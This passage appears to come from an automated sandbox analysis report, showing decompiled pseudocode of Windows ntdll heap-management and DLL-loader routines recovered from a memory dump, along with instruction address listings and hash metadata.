							__eflags =  *( *[fs:0x30] + 0x240) & 0x00000001;
							if(__eflags != 0) {
								E00A8138A(_t223, _t291, _v28,  *_v20, 2);
							}
						}
						if( *((intOrPtr*)(_t291 + 0x4c)) != 0) {
							_t287 =  *(_t291 + 0x50) ^  *_t292;
							 *_t292 = _t287;
							_t259 = _t287 >> 0x00000010 ^ _t287 >> 0x00000008 ^ _t287;
							if(_t287 >> 0x18 != _t259) {
								_push(_t259);
								E00A7FA2B(_t223, _t291, _t292, _t291, _t292, __eflags);
							}
						}
						_t147 = _v16 + 8;
						 *((char*)(_t292 + 2)) = 0;
						 *((char*)(_t292 + 7)) = 0;
						_t236 =  *((intOrPtr*)(_t147 + 4));
						_t277 =  *_t147;
						_v24 = _t236;
						_t237 =  *_t236;
						_v12 = _t237;
						_t238 = _v16;
						if(_t237 !=  *((intOrPtr*)(_t277 + 4)) || _v12 != _t147) {
							_push(_t238);
							_push(_v12);
							E00A8A80D(0, 0xd, _t147,  *((intOrPtr*)(_t277 + 4)));
							_t238 = _v16;
						} else {
							_t195 = _v24;
							 *_t195 = _t277;
							 *((intOrPtr*)(_t277 + 4)) = _t195;
						}
						if( *(_t238 + 0x14) == 0) {
							L22:
							_t223[0x30] = _t223[0x30] - 1;
							_t223[0x2c] = _t223[0x2c] - ( *(_t238 + 0x14) >> 0xc);
							 *((intOrPtr*)(_t291 + 0x1e8)) =  *((intOrPtr*)(_t291 + 0x1e8)) +  *(_t238 + 0x14);
							 *((intOrPtr*)(_t291 + 0x1fc)) =  *((intOrPtr*)(_t291 + 0x1fc)) + 1;
							 *((intOrPtr*)(_t291 + 0x1f8)) =  *((intOrPtr*)(_t291 + 0x1f8)) - 1;
							_t279 =  *(_t238 + 0x14);
							if(_t279 >= 0x7f000) {
								 *((intOrPtr*)(_t291 + 0x1ec)) =  *((intOrPtr*)(_t291 + 0x1ec)) - _t279;
								_t279 =  *(_t238 + 0x14);
							}
							_t152 = _v20;
							_t240 =  *_v20;
							_v12 = _t240;
							_t241 = _v16;
							if(_t279 <= _t240) {
								__eflags =  *((intOrPtr*)(_t241 + 0x10)) + _t279 - _t223[0x28];
								if( *((intOrPtr*)(_t241 + 0x10)) + _t279 != _t223[0x28]) {
									 *_v20 = _v12 + ( *_t292 & 0x0000ffff) * 8;
									L26:
									_t243 = 0;
									 *((char*)(_t292 + 3)) = 0;
									_t276 = _t223[0x18];
									if(_t223[0x18] != _t223) {
										_t160 = (_t292 - _t223 >> 0x10) + 1;
										_v24 = _t160;
										__eflags = _t160 - 0xfe;
										if(_t160 >= 0xfe) {
											_push(0);
											_push(0);
											E00A8A80D(_t276, 3, _t292, _t223);
											_t160 = _v24;
										}
										_t243 = _t160;
									}
									 *((char*)(_t292 + 6)) = _t243;
									_t163 =  *( *[fs:0x30] + 0x50);
									if(_t163 != 0) {
										__eflags =  *_t163;
										if( *_t163 == 0) {
											goto L28;
										}
										_t227 = 0x7ffe0380;
										_t164 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
										goto L29;
									} else {
										L28:
										_t227 = 0x7ffe0380;
										_t164 = 0x7ffe0380;
										L29:
										if( *_t164 != 0) {
											_t165 =  *[fs:0x30];
											__eflags =  *(_t165 + 0x240) & 0x00000001;
											if(( *(_t165 + 0x240) & 0x00000001) != 0) {
												__eflags = E009E7D50();
												if(__eflags != 0) {
													_t227 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
													__eflags =  &(( *( *[fs:0x30] + 0x50))[0x89]);
												}
												_t276 = _t292;
												E00A81582(_t227, _t291, _t292, __eflags,  *_v20,  *(_t291 + 0x74) << 3,  *_t227 & 0x000000ff);
											}
										}
										_t223 = 0x7ffe038a;
										_t167 =  *( *[fs:0x30] + 0x50);
										if(_t167 != 0) {
											__eflags =  *_t167;
											if( *_t167 == 0) {
												goto L31;
											}
											_t168 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
											goto L32;
										} else {
											L31:
											_t168 = _t223;
											L32:
											if( *_t168 != 0) {
												__eflags = E009E7D50();
												if(__eflags != 0) {
													_t223 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
													__eflags =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
												}
												_t276 = _t292;
												E00A81582(_t223, _t291, _t292, __eflags,  *_v20,  *(_t291 + 0x74) << 3,  *_t223 & 0x000000ff);
											}
											_t131 = _t292;
											goto L34;
										}
									}
								}
								_t152 = _v20;
							}
							E009EB73D(_t291, _t223,  *((intOrPtr*)(_t241 + 0x10)) + _v12 + 0xffffffe8, _t279 - _v12, _t292, _t152);
							 *_v20 =  *_v20 << 3;
							goto L26;
						} else {
							_t283 =  *(_t291 + 0xb8);
							if(_t283 != 0) {
								_t190 =  *(_t238 + 0x14) >> 0xc;
								while(1) {
									__eflags = _t190 - _t283[1];
									if(_t190 < _t283[1]) {
										break;
									}
									_t252 =  *_t283;
									__eflags = _t252;
									_v24 = _t252;
									_t238 = _v16;
									if(_t252 == 0) {
										_t190 = _t283[1] - 1;
										__eflags = _t283[1] - 1;
										L70:
										E009EBC04(_t291, _t283, 0, _t238, _t190,  *(_t238 + 0x14));
										_t238 = _v16;
										goto L19;
									}
									_t283 = _v24;
								}
								goto L70;
							}
							L19:
							_t193 =  *_t238;
							_t284 =  *((intOrPtr*)(_t238 + 4));
							_t254 =  *((intOrPtr*)(_t193 + 4));
							_v24 = _t254;
							_t238 = _v16;
							if( *_t284 != _t254 ||  *_t284 != _t238) {
								_push(_t238);
								_push( *_t284);
								E00A8A80D(0, 0xd, _t238, _v24);
								_t238 = _v16;
							} else {
								 *_t284 = _t193;
								 *((intOrPtr*)(_t193 + 4)) = _t284;
							}
							goto L22;
						}
					}
					L10:
					_t144 = 0x7ffe0380;
					goto L11;
				}
			}





















































                                                                                                                          0x009eb486
                                                                                                                          0x009eb48a
                                                                                                                          0x009eb48e
                                                                                                                          0x009eb491
                                                                                                                          0x009eb493
                                                                                                                          0x009eb49a
                                                                                                                          0x009eb49c
                                                                                                                          0x009eb4a2
                                                                                                                          0x009eb4a7
                                                                                                                          0x009eb6fc
                                                                                                                          0x009eb6fc
                                                                                                                          0x009eb6b3
                                                                                                                          0x009eb6c3
                                                                                                                          0x009eb6c3
                                                                                                                          0x009eb4b4
                                                                                                                          0x00a3294f
                                                                                                                          0x00a32951
                                                                                                                          0x00a32957
                                                                                                                          0x00a3295d
                                                                                                                          0x00a32961
                                                                                                                          0x00a32980
                                                                                                                          0x00a32985
                                                                                                                          0x00a32963
                                                                                                                          0x00a32978
                                                                                                                          0x00a3297d
                                                                                                                          0x00a3298b
                                                                                                                          0x00a32990
                                                                                                                          0x00a32995
                                                                                                                          0x00a3299d
                                                                                                                          0x00a329a1
                                                                                                                          0x00a329a2
                                                                                                                          0x00a329a2
                                                                                                                          0x00a329a7
                                                                                                                          0x00a329a7
                                                                                                                          0x00a32951
                                                                                                                          0x009eb4ba
                                                                                                                          0x009eb4ba
                                                                                                                          0x009eb4bd
                                                                                                                          0x009eb4c2
                                                                                                                          0x009eb6d4
                                                                                                                          0x009eb4c8
                                                                                                                          0x009eb4c8
                                                                                                                          0x009eb4c8
                                                                                                                          0x009eb4cd
                                                                                                                          0x009eb4d0
                                                                                                                          0x009eb4d9
                                                                                                                          0x009eb4df
                                                                                                                          0x009eb4e2
                                                                                                                          0x00a329b7
                                                                                                                          0x00a329bd
                                                                                                                          0x00000000
                                                                                                                          0x009eb4e8
                                                                                                                          0x009eb4e8
                                                                                                                          0x009eb4ef
                                                                                                                          0x009eb4fa
                                                                                                                          0x009eb703
                                                                                                                          0x009eb709
                                                                                                                          0x009eb70b
                                                                                                                          0x009eb711
                                                                                                                          0x009eb711
                                                                                                                          0x009eb70b
                                                                                                                          0x009eb503
                                                                                                                          0x009eb50c
                                                                                                                          0x009eb511
                                                                                                                          0x009eb514
                                                                                                                          0x009eb519
                                                                                                                          0x00a329c5
                                                                                                                          0x00a329c7
                                                                                                                          0x00a329cc
                                                                                                                          0x00a329cd
                                                                                                                          0x00a329cf
                                                                                                                          0x00a329d0
                                                                                                                          0x00a329d2
                                                                                                                          0x00a329d7
                                                                                                                          0x00a329d9
                                                                                                                          0x00a329ee
                                                                                                                          0x00a329ee
                                                                                                                          0x00a329f4
                                                                                                                          0x00a329fa
                                                                                                                          0x00a32a01
                                                                                                                          0x00000000
                                                                                                                          0x00a32a01
                                                                                                                          0x00a329db
                                                                                                                          0x00a329df
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a329e1
                                                                                                                          0x00a329e4
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a329e6
                                                                                                                          0x00a329e6
                                                                                                                          0x009eb51f
                                                                                                                          0x009eb51f
                                                                                                                          0x009eb520
                                                                                                                          0x009eb525
                                                                                                                          0x009eb52b
                                                                                                                          0x009eb52d
                                                                                                                          0x009eb52e
                                                                                                                          0x009eb530
                                                                                                                          0x009eb535
                                                                                                                          0x009eb53b
                                                                                                                          0x009eb53d
                                                                                                                          0x00a32a07
                                                                                                                          0x00000000
                                                                                                                          0x00a32a07
                                                                                                                          0x009eb549
                                                                                                                          0x009eb54e
                                                                                                                          0x00a32a12
                                                                                                                          0x00a32a15
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a32a24
                                                                                                                          0x009eb559
                                                                                                                          0x009eb55c
                                                                                                                          0x00a32a34
                                                                                                                          0x00a32a3b
                                                                                                                          0x00a32a4d
                                                                                                                          0x00a32a4d
                                                                                                                          0x00a32a3b
                                                                                                                          0x009eb566
                                                                                                                          0x009eb56b
                                                                                                                          0x009eb56f
                                                                                                                          0x009eb57b
                                                                                                                          0x009eb582
                                                                                                                          0x00a32a57
                                                                                                                          0x00a32a5c
                                                                                                                          0x00a32a5c
                                                                                                                          0x009eb582
                                                                                                                          0x009eb58b
                                                                                                                          0x009eb58e
                                                                                                                          0x009eb592
                                                                                                                          0x009eb596
                                                                                                                          0x009eb599
                                                                                                                          0x009eb59b
                                                                                                                          0x009eb59e
                                                                                                                          0x009eb5a3
                                                                                                                          0x009eb5a6
                                                                                                                          0x009eb5a9
                                                                                                                          0x00a32a66
                                                                                                                          0x00a32a67
                                                                                                                          0x00a32a73
                                                                                                                          0x00a32a78
                                                                                                                          0x009eb5b8
                                                                                                                          0x009eb5b8
                                                                                                                          0x009eb5bb
                                                                                                                          0x009eb5bd
                                                                                                                          0x009eb5bd
                                                                                                                          0x009eb5c4
                                                                                                                          0x009eb5f7
                                                                                                                          0x009eb5f7
                                                                                                                          0x009eb600
                                                                                                                          0x009eb606
                                                                                                                          0x009eb60c
                                                                                                                          0x009eb612
                                                                                                                          0x009eb618
                                                                                                                          0x009eb621
                                                                                                                          0x009eb623
                                                                                                                          0x009eb629
                                                                                                                          0x009eb629
                                                                                                                          0x009eb62c
                                                                                                                          0x009eb62f
                                                                                                                          0x009eb633
                                                                                                                          0x009eb636
                                                                                                                          0x009eb639
                                                                                                                          0x009eb71d
                                                                                                                          0x009eb720
                                                                                                                          0x009eb736
                                                                                                                          0x009eb660
                                                                                                                          0x009eb660
                                                                                                                          0x009eb662
                                                                                                                          0x009eb665
                                                                                                                          0x009eb66a
                                                                                                                          0x009eb6e6
                                                                                                                          0x009eb6e7
                                                                                                                          0x009eb6ea
                                                                                                                          0x009eb6ef
                                                                                                                          0x00a32ad1
                                                                                                                          0x00a32ad2
                                                                                                                          0x00a32ad8
                                                                                                                          0x00a32add
                                                                                                                          0x00a32add
                                                                                                                          0x009eb6f5
                                                                                                                          0x009eb6f5
                                                                                                                          0x009eb672
                                                                                                                          0x009eb675
                                                                                                                          0x009eb67a
                                                                                                                          0x00a32ae5
                                                                                                                          0x00a32ae8
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a32af4
                                                                                                                          0x00a32afc
                                                                                                                          0x00000000
                                                                                                                          0x009eb680
                                                                                                                          0x009eb680
                                                                                                                          0x009eb680
                                                                                                                          0x009eb685
                                                                                                                          0x009eb687
                                                                                                                          0x009eb68a
                                                                                                                          0x00a32b06
                                                                                                                          0x00a32b0c
                                                                                                                          0x00a32b13
                                                                                                                          0x00a32b1e
                                                                                                                          0x00a32b20
                                                                                                                          0x00a32b2b
                                                                                                                          0x00a32b2b
                                                                                                                          0x00a32b2b
                                                                                                                          0x00a32b34
                                                                                                                          0x00a32b45
                                                                                                                          0x00a32b45
                                                                                                                          0x00a32b13
                                                                                                                          0x009eb696
                                                                                                                          0x009eb69b
                                                                                                                          0x009eb6a0
                                                                                                                          0x00a32b4f
                                                                                                                          0x00a32b52
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a32b61
                                                                                                                          0x00000000
                                                                                                                          0x009eb6a6
                                                                                                                          0x009eb6a6
                                                                                                                          0x009eb6a6
                                                                                                                          0x009eb6a8
                                                                                                                          0x009eb6ab
                                                                                                                          0x00a32b70
                                                                                                                          0x00a32b72
                                                                                                                          0x00a32b7d
                                                                                                                          0x00a32b7d
                                                                                                                          0x00a32b7d
                                                                                                                          0x00a32b86
                                                                                                                          0x00a32b97
                                                                                                                          0x00a32b97
                                                                                                                          0x009eb6b1
                                                                                                                          0x00000000
                                                                                                                          0x009eb6b1
                                                                                                                          0x009eb6a0
                                                                                                                          0x009eb67a
                                                                                                                          0x009eb722
                                                                                                                          0x009eb722
                                                                                                                          0x009eb655
                                                                                                                          0x009eb65d
                                                                                                                          0x00000000
                                                                                                                          0x009eb5c6
                                                                                                                          0x009eb5c6
                                                                                                                          0x009eb5ce
                                                                                                                          0x00a32a83
                                                                                                                          0x00a32a97
                                                                                                                          0x00a32a97
                                                                                                                          0x00a32a9a
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a32a88
                                                                                                                          0x00a32a8a
                                                                                                                          0x00a32a8c
                                                                                                                          0x00a32a8f
                                                                                                                          0x00a32a92
                                                                                                                          0x00a32aa1
                                                                                                                          0x00a32aa1
                                                                                                                          0x00a32aa2
                                                                                                                          0x00a32aab
                                                                                                                          0x00a32ab0
                                                                                                                          0x00000000
                                                                                                                          0x00a32ab0
                                                                                                                          0x00a32a94
                                                                                                                          0x00a32a94
                                                                                                                          0x00000000
                                                                                                                          0x00a32a9c
                                                                                                                          0x009eb5d4
                                                                                                                          0x009eb5d4
                                                                                                                          0x009eb5d6
                                                                                                                          0x009eb5d9
                                                                                                                          0x009eb5de
                                                                                                                          0x009eb5e1
                                                                                                                          0x009eb5e4
                                                                                                                          0x00a32ab8
                                                                                                                          0x00a32ab9
                                                                                                                          0x00a32ac4
                                                                                                                          0x00a32ac9
                                                                                                                          0x009eb5f2
                                                                                                                          0x009eb5f2
                                                                                                                          0x009eb5f4
                                                                                                                          0x009eb5f4
                                                                                                                          0x00000000
                                                                                                                          0x009eb5e4
                                                                                                                          0x009eb5c4
                                                                                                                          0x009eb554
                                                                                                                          0x009eb554
                                                                                                                          0x00000000
                                                                                                                          0x009eb554

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                          • API String ID: 0-4253913091
                                                                                                                          • Opcode ID: ed67abeb0aa483d9b9bfcd059f50515d69f858220759656b4e6f5e9893693826
                                                                                                                          • Instruction ID: 0964b938fe6bfb75fb02512c0ae32e5ad9feeb6c86b53e644a34f022a1561c02
                                                                                                                          • Opcode Fuzzy Hash: ed67abeb0aa483d9b9bfcd059f50515d69f858220759656b4e6f5e9893693826
                                                                                                                          • Instruction Fuzzy Hash: 7AE18A70A00245DFDB1ACF69C895BBAB7B5FF44704F2485A9E4069B392D734ED41CB90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 009D8794, Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 83%
                                                                                                                          			E009D8794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E009D934A() != 0) {
								_t159 = E00A4A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0xab5780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E00A45510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0xab5780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E009D849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E009D8999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E009D8999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0xab5c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0xab5c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E009E2280(_t92, 0xab86cc);
															_t94 = E00A99DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E009F61A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0xab5c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E009D8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0xab5c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0xab5c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E00A0F380(_t136, 0x9a1184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E009E2280(_t108, 0xab86cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E009F61A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E00A99D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E009DFFB0(_t118, _t156, 0xab86cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E00A09A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}












































                                                                                                                          0x009d8799
                                                                                                                          0x009d879d
                                                                                                                          0x009d87a1
                                                                                                                          0x009d87a3
                                                                                                                          0x009d87a8
                                                                                                                          0x009d87c3
                                                                                                                          0x009d87c3
                                                                                                                          0x009d87c8
                                                                                                                          0x009d87d1
                                                                                                                          0x009d87d4
                                                                                                                          0x009d87d8
                                                                                                                          0x009d87e5
                                                                                                                          0x009d87ec
                                                                                                                          0x00a29bfe
                                                                                                                          0x00a29c00
                                                                                                                          0x00a29c02
                                                                                                                          0x00a29c08
                                                                                                                          0x00a29c0d
                                                                                                                          0x00a29c0f
                                                                                                                          0x00a29c14
                                                                                                                          0x00a29c2d
                                                                                                                          0x00a29c32
                                                                                                                          0x00a29c37
                                                                                                                          0x00a29c3a
                                                                                                                          0x00a29c3c
                                                                                                                          0x00a29c42
                                                                                                                          0x00a29c42
                                                                                                                          0x00a29c3c
                                                                                                                          0x00a29c02
                                                                                                                          0x009d87da
                                                                                                                          0x009d87df
                                                                                                                          0x009d87e3
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x009d87e3
                                                                                                                          0x009d87f2
                                                                                                                          0x00000000
                                                                                                                          0x009d87fb
                                                                                                                          0x009d87fd
                                                                                                                          0x009d87fe
                                                                                                                          0x009d880e
                                                                                                                          0x009d880f
                                                                                                                          0x009d8810
                                                                                                                          0x009d8814
                                                                                                                          0x009d881a
                                                                                                                          0x009d881c
                                                                                                                          0x009d881f
                                                                                                                          0x009d8821
                                                                                                                          0x009d8822
                                                                                                                          0x009d8824
                                                                                                                          0x009d8826
                                                                                                                          0x009d882c
                                                                                                                          0x009d882e
                                                                                                                          0x00a29c48
                                                                                                                          0x00a29c48
                                                                                                                          0x009d8834
                                                                                                                          0x009d8834
                                                                                                                          0x009d8837
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x009d8837
                                                                                                                          0x009d882e
                                                                                                                          0x009d883d
                                                                                                                          0x009d8840
                                                                                                                          0x009d8843
                                                                                                                          0x009d8846
                                                                                                                          0x009d8849
                                                                                                                          0x009d884c
                                                                                                                          0x009d884e
                                                                                                                          0x009d8850
                                                                                                                          0x009d8852
                                                                                                                          0x009d8854
                                                                                                                          0x009d8857
                                                                                                                          0x009d88b4
                                                                                                                          0x009d88b6
                                                                                                                          0x009d88b6
                                                                                                                          0x009d8859
                                                                                                                          0x009d8859
                                                                                                                          0x009d8859
                                                                                                                          0x009d8861
                                                                                                                          0x009d8866
                                                                                                                          0x009d886a
                                                                                                                          0x009d893d
                                                                                                                          0x009d8941
                                                                                                                          0x00000000
                                                                                                                          0x009d8947
                                                                                                                          0x009d8947
                                                                                                                          0x009d894a
                                                                                                                          0x009d894c
                                                                                                                          0x00000000
                                                                                                                          0x009d8952
                                                                                                                          0x009d8955
                                                                                                                          0x009d895a
                                                                                                                          0x009d895d
                                                                                                                          0x009d895d
                                                                                                                          0x009d895f
                                                                                                                          0x009d8961
                                                                                                                          0x009d8961
                                                                                                                          0x009d8968
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x009d896a
                                                                                                                          0x009d896b
                                                                                                                          0x009d896e
                                                                                                                          0x00000000
                                                                                                                          0x009d8970
                                                                                                                          0x009d8970
                                                                                                                          0x009d8970
                                                                                                                          0x009d8970
                                                                                                                          0x009d8972
                                                                                                                          0x009d8972
                                                                                                                          0x009d8974
                                                                                                                          0x00000000
                                                                                                                          0x009d897a
                                                                                                                          0x009d897a
                                                                                                                          0x009d897d
                                                                                                                          0x00000000
                                                                                                                          0x009d8983
                                                                                                                          0x00a29c65
                                                                                                                          0x00a29c6d
                                                                                                                          0x00a29c72
                                                                                                                          0x00a29c75
                                                                                                                          0x00a29c75
                                                                                                                          0x00a29c82
                                                                                                                          0x00a29c86
                                                                                                                          0x00a29c87
                                                                                                                          0x00a29c88
                                                                                                                          0x00a29c89
                                                                                                                          0x00a29c8c
                                                                                                                          0x00a29c90
                                                                                                                          0x00a29c95
                                                                                                                          0x00a29c97
                                                                                                                          0x00a29ca0
                                                                                                                          0x00a29ca3
                                                                                                                          0x00a29ca9
                                                                                                                          0x00a29ca9
                                                                                                                          0x00000000
                                                                                                                          0x00a29ca9
                                                                                                                          0x00a29ca3
                                                                                                                          0x00000000
                                                                                                                          0x00a29c97
                                                                                                                          0x009d897d
                                                                                                                          0x00000000
                                                                                                                          0x009d8974
                                                                                                                          0x009d8988
                                                                                                                          0x009d8992
                                                                                                                          0x009d8996
                                                                                                                          0x00000000
                                                                                                                          0x009d8996
                                                                                                                          0x009d894c
                                                                                                                          0x00000000
                                                                                                                          0x009d8870
                                                                                                                          0x009d887b
                                                                                                                          0x009d887d
                                                                                                                          0x009d887f
                                                                                                                          0x009d8881
                                                                                                                          0x009d8884
                                                                                                                          0x009d8884
                                                                                                                          0x009d8886
                                                                                                                          0x009d8889
                                                                                                                          0x009d888c
                                                                                                                          0x009d888e
                                                                                                                          0x009d8891
                                                                                                                          0x009d8891
                                                                                                                          0x009d8898
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x009d889a
                                                                                                                          0x009d889b
                                                                                                                          0x009d889e
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x009d88a0
                                                                                                                          0x009d88a8
                                                                                                                          0x009d88b0
                                                                                                                          0x009d88b2
                                                                                                                          0x009d88d3
                                                                                                                          0x009d88d5
                                                                                                                          0x00000000
                                                                                                                          0x009d88d7
                                                                                                                          0x009d88db
                                                                                                                          0x009d88dc
                                                                                                                          0x009d88e0
                                                                                                                          0x009d88e8
                                                                                                                          0x009d88ee
                                                                                                                          0x009d88f0
                                                                                                                          0x009d88f3
                                                                                                                          0x009d88fc
                                                                                                                          0x009d8901
                                                                                                                          0x009d8906
                                                                                                                          0x009d890c
                                                                                                                          0x009d890c
                                                                                                                          0x009d890f
                                                                                                                          0x009d8916
                                                                                                                          0x009d8917
                                                                                                                          0x009d8918
                                                                                                                          0x009d8919
                                                                                                                          0x009d891a
                                                                                                                          0x009d891f
                                                                                                                          0x009d8921
                                                                                                                          0x00a29c52
                                                                                                                          0x00a29c55
